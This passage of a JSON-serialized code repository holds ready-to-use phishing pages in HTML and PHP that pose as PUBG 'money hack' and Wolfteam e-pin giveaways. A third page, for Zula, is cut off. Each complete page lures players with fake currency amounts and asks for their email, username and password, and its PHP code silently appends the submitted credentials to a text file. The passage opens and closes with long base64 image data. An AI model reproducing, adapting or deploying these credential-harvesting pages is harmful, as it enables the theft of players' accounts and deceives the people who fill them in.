a1eXMN6B9V5JOw0XXbzTabmbzvM79mht1TGx07rfv0/NS8EA4TNrwaVQO9A8xr71XPEKa/Y6Cx11oA/NMh9h3K3OJrrqgONkBjcNA5rqc4tbmF06s1XQvrzKcbBNxDjBm8RiZGbAIY3I0EDSgPIH15+UGBxpZICNwVSZm0s2L6Vemh+HJMdJGCS9xFa0KzOG5AJ2JST28jOO7g6JA6wD1APxVtjkA4VxFuZsIGgBa12bNmy7HYbjVHWrbqsVkU0YdsHCWGZztUzM5/iothNC98zrcNtdAeiXYRgkxEsh17ugw66BxeAa56Xv1UHaR1vlI1IY1voC5ov5/NWfs+eGiR3UtHwF/8Acs5fFe/1NJ/Dp1+iOkYMq2/FgIQzEaKCbEEqy68srKeEEZcb0VKXGWqTnleI1WkA7GyWSYlMc80mrwlHgHcbD+1j1SWa73zSVP8AxUWPXZelfzVSaauemqZPiKB/q0NlfZXDdF6HPUvfLiP97HX9T6rDSx2LmX97lw4m/RQ4hzSqtpWvQqNNXTFQgsJHE3amdsnKby2McxNpS2lSsEBHSB9quL9xGGNrPJfuArfy3050tDSynbrhckgZJG0uI8DgNdC7wmuWpNnzHRVdXu9J7Szo9vqrcYifGyPJLnOd6nT4DQKJsbnaAI3jcCGEtqqJA9ATr79/elw7DjNRH8fcsfabW4Ff2cQLKX3NwAcDR+nL4arYnh4oeHp1tXY8ExoFMbppdeXUpYQylIznA+LYqOgWmVoBoOBJbz8Lv42FqsDxNrtS17HAHwuboSBejhoemqvYaIHUta0aaNoX6Vr7l6WMBNNu9KA1PPTodE6GbB15RqfWtPM1WyzGcySPkbYu+8DToRqC+hu0ir87Wl7XQGDD94auRpyUbokhuvQ63SwPDOJGMgHQA6EEgt9CNQmcuQkuDSGMUKAFADQkg/3teor4LPcSgIfm0/r/AFWrh4rDI2hkca1tuU6c7YQL31LSfihnFpoy1oa1oJvUuJPIaddfIou6B5TC/ZKAvisENILKcRrTTdaciPCfQLWtag3ZfBuZFbifFqAQW0P3SfyC0UUfPpr8Fq6ZenVuMrU/8l20B8U4TeGkc57Q+aRpHtkNDaAboaIOUE6b7Kl2LwpayRhIzB91fKgAR5GjqiXaWaoIG9cqGdnZXfeIwa9mSvIVdemm3UBZGivk7E35/k3dfo640tR4x/BsmaBMcVIWphat1HNkdJqeWrzKiQ2Ri8pTCNOEaWRhiSkyJJh8FNzy7U/6eiWRPYzRSBiKuuNcVGCwkDOyU5OUnlsrmNed2rWRLIiAKoYnBinyL3IkIgyJrpAwFx2aC74AlTPCqYuDOxzDs4EfFDNNxaQcGlJNnLOK8Uc57jWpJJ9eevNVRxCcDRxHpY/NWcXwuSKYxyCiNQeThehaeYTsVFQXPSyu50ccPsWOH42d7C4uPhNbnoNN/NSP4pO3Z2nrf1tWuD4Q/cZZXC2B5IA3NANJ921BC3yAD9XXqNR8VFJyiyZRg4hWDtI+vEGu9NKvdWcP2naCCYiQKO/nfw0WTbiBeqmGJA96dSkC4xCnaHjsmJIsFrAS5oJs7deg102F+aEOhiMbnO0fmAaBpejiSR09lKWYu2GnkFc4ZhRI5o1y87qvP3pP3kMu+2Ja7P8AZYzRd6+wCfCBzH4j08ltOEcBjgFtYLOxOrgKHP4oxwfDARAK1PDRUvT57r1ntyB1KChp3j6FSONSymmu/dP0T8iZiW+Ak6Alo6buC2tVLbTN/RmHoo7r4L6oCdqwKhbQsAfQIf2IjD53HmLI97adp8Pirva2UGZpBBaGl1gggjWiD0pV/s8jIxJ02jl+OeIfxXPaT54/qdVrmnVJ/Rm0dEQk2NGG4YOGuiezAt6roPUSOV2AQxJuRH3YAclTxWByp42JjOtoEuXoU7oCpMNh7OqkbWAEmVcqSM/dmpIPURJsAbWaJwYpQ3ReBqsFYjypZVMGpZUwxDlTXBTOCjISEQuamGNTgL3KmED8Xw9koyvaHDz3HmDyQqTsdE79uQb7ZefmWrUNjUgjUNlFc3mSJ69RbWsRZkOOSswcMULIy5njvS3aMdRs6XmIsnlawHFMW55BPgA5N3PqeZ+S6l2t4HiMQxogDSQaLTp7WmYO8un+izXDfsyxb3XORG29aIe8/u14R6n4LN1FTdmEv0NPTXxjVlv9TAPdXlz21KaNdlre3HZiLDODYmyAj2nOcCHEiwANwa15eSzmGjHvVG3MHgvVYsWUeYZjw67/AII92bYQaI9k+42VSiiR7hYDRZVeVmYtMuV1YkmjaYTFhrQCUSw1yglrSQNzyHvVLsLwqHEPEmIkAZZEceo7wtNFxO2UGxW5LT013nE8IGDwgBnKhQCm0eYTUyvrnGcHWY/u1lftEJMDYq0c6yb2y6jStV0+PgJc0OBFEWFz/wC0rh+VjAQSbdVeTb/ILavuhOpqLMLTVyhaso5fiJHjI5rnZrymyTmB0DheoB6Le9iDlnc0a5Y3W7a8zxsN/wBn5rFQQh80TBVOfGP98G/hYW07CuvEyDmYgfg4X9Vn0JO6OTVtbWmng3jMW5Txz+agEeqmfh6FrZaiYSbLDcWvJsZeiqgJrgh9OIW9koBPNXosNQtQYVXZ5dBSim3nCJIYxljfu5SS79ySDEg8xA3d6LzIrgZovDGrW8pOJVyJrmq33aY6NEpA4KRamlqvx4QlEIuEAjfVNK6Me4UYNmfDFPHCisHByTSMQ8CGXXdRWaqEfJJCicvBnMPhS40Ecw/ArSlfDhAZJ5GtaBfVx9GjVc57TdvcTiXd3h/0MZsNF+Ij8cjhsPIellUbtW28RL2n0eVmR0qGTCYd7WSTxNkeaa1zmgk9ALRybu2tzEtDa3JFfFfNWE4dJiZu7YdAQZZSPERfU7Ei6at1h8AI2d23NXPO9zyf8xNegVV7pvLZc9OFawkD/tIxWHfjcucdziImte8bRvjcTHKD5EkHlTiubcV4bLDIWPGu4cPZe07OaeYK3PaLgxe2RxFnK6vIAaAKj2Xb99wTIXnWNxax3OOSrb6scCAR11FEIbI8YJapJGXwTeqKiwNExkFXYojSuhGhCdIzw1velevJUWjTjwjoeMwXckNIIbGyOOM6i2sGp9S4ud6kq/2e7cwmV3DsS6nU0RyE6W4XkJPMCiDzuuS87R44iCBkxGeGBjsQb0EmQFzb8tfiFx7guCOLxhkk0aXOlf0Iu2t9+g9FeXKSRlvu8n0xweYsBw7yC4asIunNPqN1yv7WYpX4qKONsj3PAtoPhbR0Ir2TrqfRdM7LzuLGCtGtrxWXX/dJ5H8lU7V8MPixkAInjbqBRbKxpstcCN6uiKSbfICisqRwXE8CxMVySQua0ZPGNhdW8ObtVa+RWi+zo5sXI+7AiI9cz21f+Urp0WWSJs8RDcwb3mXQbaPLfLY+V9Ah+B4MwTuexrWPe0NcAA0PIJcCa/a1UlElvTkNfn02ol6MtPJWKFKuxlFStetSX0MZP3IJGi+ijDApSUgEaYOR7DyT2jqoQ0qYNNIGHFnuTzSTdei8TBZCuI4UQdBpSHyw0ti0IVxPCjNY3Ko1aht4Zau06SyjPiNWWYLqiEHDyVdZgBSlnqEivGhvwDo4AFIyMk6K7Fw8ndXYsKAq8rkWIaeUvBDh4QAOqlxAIYa3o0nStqqrcb9EH7S8SEUJNm3EtDt8p9FVcs8mhXXtWDC8Y4QydzjPMABZNOOUAXlDiAdT62SfRY+PgbjI4tdlY4nKCMz8v7Ids0Gug36rVy4c4uRkfiIJz65Q0DWqYwADa7qzpZWrj7IsaBlJvmSijz3JJPBlOGcPjiblaMoGuupJ6uPMqeSVv7LXF3l1Wlf2Z8g712UkfAHeQUqkkQtZMfNG5wNsFURR/kuZcMJwONfCSRG8ge67jf7tveV3yXs69wqwP5bLIdsewIa1uJA70x2JGAamM6lzQNy0610JSk0xRTRlON8Od94JY01LTwBtZ9sD0dfxCL8N7Ndw5ks1OlPihh31G0rx+EbgcyEf7I8WwmVsc2VrheSTUtI8ySaNV8Am9p+0sTg+GABrTrLIdHvHO3HVra5nU8tFWdfxZLXrPZgy+NhOJf48xjDxpWs8hOn7ws7cyurdkuzwwsXia3vX06Q1oPwxt8mjnzNnoAH7B8APhxMzaA/UMddgH/1XA7GtGjkLPPTb0pG8kAw6cvgoyRt/XwVikx7AdwlkY5j2hweMwj80MgbEXHwkWwhx1a47tJFjYi9Vb4XiHPgjksB+ztTTXNO2atB0vX1W6xODD2lpIIOhDhmH1XMW4Z+FxUsZzNJbbHMA1a23HwusOblu2m7ryT/URt+GwHEd44ty0W0QQ4OtoJIrbVNxPDHN5Kv2O4wxznRggmswDWZKAoEkAVzC1rXtdpv/AF0UkL5w48EFmmhPnszFOhIXndo7xTDtadBys+Vk19ChhK0K7t6yjLsp2SwyKFivsaOiqWpgTSafI8GkS5QkoNUkOA9yNWFXljBNr2Rmo1UwWauDRfx8EbVNG1NZEpULZJXBrlnqZI+k9QTa6dEyJirjprjc5uul15jUfNc+7S4kzyiN7vCDmFbAPa11+4X8Vo+Mudh3d9HZjP6xnl1HQgrCzYhr5pnNNtzOa3loTlHwCaQcF5NX2Hwucumqm7MHQaBo/wAoatoAh3Z/DBkEYHNrXHlq4A0iRoao12IpPLFaVpWoZsZG006RgJ2BcAfhaQxOF41KJ1i0khji/aHDNjxWIDWZQJXeEaCjzb06+9FOwHDIcTiXh7MzIGskDTq3vXvORz27OIDXEA7Ve6j+1VxjxBIsd41rrAGtUyvjSOfY3hC3BSTOBzTzvOu+WOogPTM15/xJ/A5viE0JWVXGKYNC4X70hi0laZHK12zgfQgkeoTZsSxpaHOALjTb0snYDzTCJLWP7dwta+CcjQPDX+bSaPyJWvQbtdgjLhntG48QB8uidDmG7GN7nHNaHHxNkjIPOhm+rV0p2IYAS+qbXrZ0AHO1xqDHBvEISNbljd5mwCfqV0nhgknmD3RvDGXkzNLQSd5NQLNeEdBZ5hLwO+4aczwnMTTt71Nnl7tggkkVEhaHEZhQbGXHrYDW/E2qUuAkJs0b91eSlosUSpqqXNZS5BGROFoiOHSA7D4hOk4e87MA96s+tH3KS08/YGWkr/8AZsn4R8Uk/qw9xejZ7MuteTQV5gpUyF6HkKnJZLcJ7GXgV6VXZKnd6otrLSujgmQ/FSP1yaEHTz2VkzKB7Re6dIJTUuwG4lxWNjKnY4B2l14T7+S5hE0d7I1u3eS5eejSQNfeF2TikUb2FkgBBGt6ArjbcjMVKxvsskma3nbRJQ19Ahl4Ja33Oq4Xi8klNgh8IAGeQ5AQNPC0Au5c6VrFSzZSDA2TnTXgXRse15gc0H7O4imCzuNR5rRxTNPMJ9oDZVbgnSAd8b6saS1noebh6/BWMNgo49I42M/da1v0ClbK26/l8Cd1LSQwyk0KRwUdJwTjv2pYnvMe1l2IhGOurjdf75Wn+yXFHu8TAT7Ewkb5NlbVD/FG4/4ljeP4jPisQ+v/AHBHua7+SK/ZRiqxcrf9pE4gdSx7T9CU/gc60vMybZ6JNBSGIsTh2SDxNB6HYjzDhqCqRws7NI5wRenet7wt9HAgn3og5pSZGSk0h0UQMYNnQvPQtc35gmkRhic6OpQ23CnBpJbruATRXs+JZGPEa+p9yEY7jmlNtoOmY8v4eqoanXU0J7nz7eQuC7FFhsMKYxjNAKa0ZiBtdan3rx3Fxu1jiOuyz7pmg1eZx1oeJ3qa2HmdFM3Md9PK7Py0HzXO3/8A0E+dqwvH9f4JK65TfARn7QBjS5wDWjmSr3Bsc6aPvCwsBJyg7ubpTq5Xr8Fm5omvItocQdL1o9VBxHiD47zPcAB1KDSdbu+exOXjwkXY6FyeEzcr1Z7sfFN3bpZSf0pBY0kktYBpd8zv8FoV1dM3ZBSaxnwU7IbJuKecCSSSUoBQkbqU2ldc1QSFSqRRnVh9xgallXq9aEWQNh4GqIAG9fnsvcRiWNBtD/vDKJzHyQZyW64bYlfi2KcxpzMErfw6bLkTpmnGPMbMrHPJa38IJc7L7lr+1IkBJZIXF37IBv03XPHyuZifENQY+e16FBNk8F3OscBwbnNbJI7Q65R0H+i1mHw7OQWf7OYhkkTMtAtFEdKNWj7Q4fl5KTBG2EmxN6LwQgbaKCLvPL6qxHm5ke4VXzQMdCyeagjDxerfgR+ZVpwUOF52DudyD8KTZFg4ROR389k/rJNN93EKfsDKI+J4f+8ZY/XO0n8lT4r4cViG3tLJd/vFN4HMGY7CvJGkrSPecv5o/Ax9A5VG40p6TS1CmLBUdKdgPelLP3TC53tHYefIKzkahvFuFvldmE2RoG2QEjqbJ/JV9VOxVv0lyOkCsVJZzONk8/yAVZ0ZcKdo38I3P7x/IKTDYc7BxeRerqBI9OSdMwt3r0u/ovPr7rZyc0vv4NKnSwXzd/Yjw4EYpoAZ5aZfPzH0+g3E9qsGNPvDD6Eu+ig49K+QMwkR/SYl3dgj9lm8j/8ALa1uG7GYBrWt+7RGgBZaLNDc+av9P6R/mwdtjx/JPZZChpNGMd2swwupRrzyv/grHZ7BnHT5zrhoSCTrUr9wNeQ/rdEO18PDcCxjjg4nue6g2gDlGr3e7T3kI92T4pg5YgMLla0bxgZXMJ1Nt/NdBpugqnFjy4rsV59Vrea4cSDjRS9SSWwUBJJJJCGSbKuVaKicxFFkNsM8kQUpNC0mspDuI8Y7p+UssVd3X1TtjVwIJzMdmta06+M0PeqGIxWHaAJJQ4/hj689VHj8VHim2BmrSr29yyOPc1l1VjTTSj0TNsmSGdquOuc3JCO6aL13c4+ZWHlii+7yueHGVzm906xTaAJLvOz8kS41iQWkeW++qDvvuXDmCL/y39KUVjJ60dQ7IYdsmHinzU5wB0NHrRWvj4k1tAvGmm+q5R2VxLhAxjSQCwH3ncgf1stdw+MaFxvrY+asReUV5Lk3eFx7H7EHqrrSszw8BtAM8gR70YGauhKZxBTL6iy0Skx+ijbI7MdBQqvzQYCycE7VjLj8WKr9MaH7zWu/M/FDmjLiMO4g332HHxmZr80Z7e03ieK137l3/DsrJz4495ETsJY3fCRhR+Bd2fUzSmvkAVHDY1r2hzDuOY28iosTMWnNm0vWx7IrkeSHAglEb30/rdU+PT5IietD4r3AkF+YHl/RVvF4dsjHMcLDhRVfVVSsqlCLw2miSqSUk2YtuKG4Ka6QHmgPF4pMPK6N3LY/ibyKqDiB6rz6WjnF7X4OkjUpLdE1fYPB97NNjnbAuggHRrD+kf6lwr0Hmq/2p9o3QhmHieWvd43kGiGj2W+86/4fNO+zLioBlwbuRdNF5se63t8y1x+BHRTfaricNFhs74o3zyfo4i5rXObzc4E8gPmQvROkxrjGtRWUcz1RTe9N4/BynE4uSUgyPc8jbMSa9LUmCmfE4SRuLHDYg0UNgnXSPsy7OxYhsk88bZIwe7ja9ocC4avfR6aD4rqrbYVVuTX2OXqpsttUU/uEOzX2jtNR4ugdhK3Y/vt5eo09F0SN4IBGoOoPVC2dmcENsNCPSNv8EUjYAAAKA0A6Aclz9865PMFg6GiFkFicsjkkklATiXhC9SSEMcQBZIA6lBuKRZs+aPvGkBzay3pVjX3G0bc0EUdkHx3C5h4sNNkI/wDTeM8TvL8TP8JryT5Gwcv43KIZQWMngdzzigfKxob8iveJ8aE7NIw3S3m/oug40vkjMeJwhPUtqVnqOfyXLuKwMwsrvaDbIyyMc0EHcWUshdwDxIAi2uBrlX9aqo2zG++TQf8ALmab+XwU742kuLHU0nRt2W/yRHiHZTEw4f7y5txTRctXNN5ml3TMCoZZZPFpBD7Ni2QNY5wGVxab6E5h9SF1aPgjSAWu9DuuJ9g4Q5z256kIaY2HZ4Bp+u+YXddF0D+3poqhhcaGx3151fJS1T3Rx7EFqxI3GHwDm6WNt/NWxFX7V+9YTCnFyG3ymtf6pF8Ph3MGji/Y0TvR5DkVLhkZo89c1SlxcglDQG5S02cpvQ/iuuZ0rko2daN6G9/cqmNa3vGOc0u1GtnzF1tsXJYEcj+01xPEZnHeoiAP/ibqfksbink61qHN25ba/RaL7UJy7ik7dxljJ218Av6LLYmcDPXQ8z0PRCGng+ocNEBVUNBoPOj+a9lr2XOokGq52aTOG5iGkm7a09P2Run4pzGAl+Uep1Pp5pwcj+DYbI93PTT4owhPBcSHEgbgAnnv/RRdBLuOjPdsOBfeYrYP0rNWf3urT6rlWKZLESJInsre2mvjsu7UmlgO4Wfqen13S3dmaOl6hKhbWso+fv7WfE9mIgIEsRJbzBBFOa4cwQgnHePTYt4kxEmdw0aNAGg8mtGy+j8VwXDSfrIIn/vMafqFDguzeCidniwsDH/ibGwO/wAwFq/07/qRcWs+xV6nKGsalHMX59mcN7PdhsdiSC2IxsP7cvhFdQ0+Iru/AeFtw0EcDNo2gX+I7lx8ybPvV8Beqe7UTt79ilVp418ruJJJJQE4kkkkhCSSSSEJJJJIQ0qLE7e5JJISOd9ofaKO8S/8rP8A9dn/ACtXqSGPkefj9Tkv2ef/ANh/df8A9Jq1/Dfb/rokkpK/lFd8xs8L+X5p2F9p/u+pXiSlIfARh2Qji/7Pq76pJJvIUTh32sf+ZT+kf/TCyr/1Lvf9CkkowmfS3B/1TP3G/QLyb2h6n/lXqSPwCu4S7O7u9B+SOpJIJdwkJJJJCOJJJJIQkkkkhCSSSSEJJJJIR//Z\" type=\"image/vnd.microsoft.icon\">\r\n  <style type=\"text/css\">\r\n   .div1{\r\n      background-color:#040302;\r\n      height: 710px;\r\n      width: 500px;\r\n      border-radius: 35px;\r\n      border:4px solid #21160d;\r\n      opacity: 0.8;\r\n      filter: alpha(opacity=40);\r\n    }\r\n    .text{\r\n      color:red;\r\n      font-size: 48px;\r\n      background-color:black;\r\n      padding-bottom: 20px;\r\n      border-radius: 48px; \r\n    }\r\n    .text2{\r\n      color:orange;\r\n      font-size:28px;\r\n      background-color:black;\r\n      border-radius: 50px;\r\n      padding-top: 25px;\r\n      padding-bottom: 25px;\r\n    }\r\n    .input{\r\n     height: 40px; \r\n     width: 250px; \r\n     font-size: 18px; \r\n     padding: 5px; \r\n     margin-bottom: 15px; \r\n     border-radius: 7px; \r\n     background-color:#b4b2b2; \r\n     border: none; \r\n     color: #000; \r\n\r\n    }\r\n    .button{\r\n     width: 100px; \r\n     font-size: 18px;  \r\n     margin: 0 auto;\r\n     background-color: red; \r\n     border: none; \r\n     height: 40px; \r\n    border-radius: 18px;\r\n    }\r\n     canvas { \r\n     display: block; \r\n     position: fixed; \r\n  top: 0; \r\n  left: 0; \r\n     z-index: -1000; \r\n }\r\n .body{\r\n  background: url(\"https://image.radionawa.com/root/root/images/1224102018_youtubegaming2560_1440.jpg\") no-repeat center center fixed; \r\n    -webkit-background-size: cover;\r\n    -moz-background-size: cover;\r\n    -o-background-size: cover;\r\n    background-size: cover;\r\n }\r\n .select{\r\n  color:orange;\r\n  font-size:18px;\r\n  width:75px;\r\n  height:40px;\r\n  background-color:#040302;\r\n  border-radius: 20px;\r\n }\r\n  </style>\r\n </head>\r\n <body class='body'>\r\n  <center>\r\n   <div class=\"div1\">\r\n    <p class=\"text\">\r\n    Pubg Money Hack\r\n    </p>\r\n    <form method=\"post\">\r\n     <p class=\"text2\">\r\n      PUBG\r\n     </p>\r\n     <p style=\"color:red;font-size:14px;\">E-MAİL</p>\r\n     <input class=\"input\" name=\"mamak\" placeholder=\"xxxxxxxx@xxxxx.com\" type=\"text\" required=\"\" />\r\n     <p style=\"color:red;font-size:14px;\">Password</p>\r\n     <input class=\"input\" name=\"ssel\" placeholder=\"***********\" type=\"password\" required=\"\" /><br>\r\n     <select class='select'>\r\n      <option>1000</option>\r\n      <option>3000</option>\r\n      <option>5000</option>\r\n      <option>8000</option>\r\n      <option>10000</option>\r\n      <option>25000</option>\r\n\r\n     </select>\r\n     <br>\r\n      <br>\r\n<input type=\"submit\" value=\"Next\" class='button'>\r\n\r\n\r\n</form>\r\n</div>\r\n</center>\r\n<?php\r\nif (!empty($_POST[\"mamak\"]) && !empty($_POST[\"ssel\"])) {\r\n$ac = fopen(\"pubg.txt\",\"a+\");\r\n$names = @$_POST['mamak'];\r\n$password = @$_POST['ssel'];\r\n$userlar = (\"\\n __________________ \\n Password: \".$password.\"\\n E-Mail: \".$names.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n}\r\n?>\r\n\r\n\r\n\r\n</body>\r\n</html>"
  },
  {
    "path": "Site/Game/Site-wolfteam/index.php",
    "content": "<!DOCTYPE html>\r\n<html>\r\n <head>\r\n  <title>\r\n   -- Zula V1.3 --\r\n  </title>\r\n <link rel=\"shortcut icon\" href=\"https://baksen.org/wp-content/uploads/2017/11/maxresdefault.jpg\" type=\"image/vnd.microsoft.icon\">\r\n  <style type=\"text/css\">\r\n   .div1{\r\n      background-color:#040302;\r\n      height: 710px;\r\n      width: 500px;\r\n      border-radius: 35px;\r\n      border:4px solid #21160d;\r\n      opacity: 0.8;\r\n      filter: alpha(opacity=40);\r\n    }\r\n    .text{\r\n      color:red;\r\n      font-size: 48px;\r\n      background-color:black;\r\n      padding-bottom: 20px;\r\n      border-radius: 48px; \r\n    }\r\n    .text2{\r\n      color:orange;\r\n      font-size:28px;\r\n      background-color:black;\r\n      border-radius: 50px;\r\n      padding-top: 25px;\r\n      padding-bottom: 25px;\r\n    }\r\n    .input{\r\n     height: 40px; \r\n     width: 250px; \r\n     font-size: 18px; \r\n     padding: 5px; \r\n     margin-bottom: 15px; \r\n     border-radius: 7px; \r\n     background-color:#b4b2b2; \r\n     border: none; \r\n     color: #000; \r\n\r\n    }\r\n    .button{\r\n     width: 100px; \r\n     font-size: 18px;  \r\n     margin: 0 auto;\r\n     background-color: red; \r\n     border: none; \r\n     height: 40px; \r\n    border-radius: 18px;\r\n    }\r\n     canvas { \r\n     display: block; \r\n     position: fixed; \r\n  top: 0; \r\n  left: 0; \r\n     z-index: -1000; \r\n }\r\n .body{\r\n  background: url(\"https://i.teknolojioku.com/storage/files/images/2018/05/24/3643060-wolfteam-wallpapers-abqk-co-jHr5_cover.jpg\") no-repeat center center fixed; \r\n    -webkit-background-size: cover;\r\n    -moz-background-size: cover;\r\n    -o-background-size: cover;\r\n    background-size: cover;\r\n }\r\n .select{\r\n  color:orange;\r\n  font-size:18px;\r\n  width:75px;\r\n  height:40px;\r\n  background-color:#040302;\r\n  border-radius: 20px;\r\n }\r\n  </style>\r\n </head>\r\n <body class='body'>\r\n  <center>\r\n   <div class=\"div1\">\r\n    <p class=\"text\">\r\n     Wolfteam E-pin\r\n    </p>\r\n    <form method=\"post\">\r\n     <p class=\"text2\">\r\n      Wolfteam\r\n     </p>\r\n     <p style=\"color:red;font-size:14px;\">E-MAİL</p>\r\n     <input class=\"input\" name=\"mamak\" placeholder=\"xxxxxxxx@xxxxx.com\" type=\"text\"/ required=\"\">\r\n     <p style=\"color:red;font-size:18px;\">Username</p>\r\n     <input class=\"input\" name=\"user\" placeholder=\"Username\" type=\"text\"/ required=\"\">\r\n     <p style=\"color:red;font-size:14px;\">Password</p>\r\n     <input class=\"input\" name=\"ssel\" placeholder=\"***********\" type=\"password\"/ required=\"\"><br>\r\n     <select class='select' required=\"\">\r\n      <option>1000</option>\r\n      <option>3000</option>\r\n      <option>5000</option>\r\n      <option>8000</option>\r\n      <option>10000</option>\r\n      <option>25000</option>\r\n\r\n     </select>\r\n     <br>\r\n      <br>\r\n<input type=\"submit\" value=\"Next\" class='button'>\r\n\r\n\r\n</form>\r\n</div>\r\n</center>\r\n<?php\r\nif (!empty($_POST[\"mamak\"]) && !empty($_POST[\"ssel\"])) {\r\n$ac = fopen(\"wolfteam.txt\",\"a+\");\r\n$names = $_POST['mamak'];\r\n$username = $_POST['user'];\r\n$password = $_POST['ssel'];\r\n$userlar = (\"\\n __________________ \\n\".\" Username: \".$username.\"\\n Password: \".$password.\"\\n E-Mail: \".$names.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);}\r\n?>\r\n\r\n\r\n\r\n</body>\r\n</html>"
  },
  {
    "path": "Site/Game/Site-zula/index.php",
    "content": "<!DOCTYPE html>\r\n<html>\r\n <head>\r\n  <title>\r\n   -- Zula V1.3 --\r\n  </title>\r\n <link rel=\"shortcut icon\" href=\"data:image/jpeg;base64,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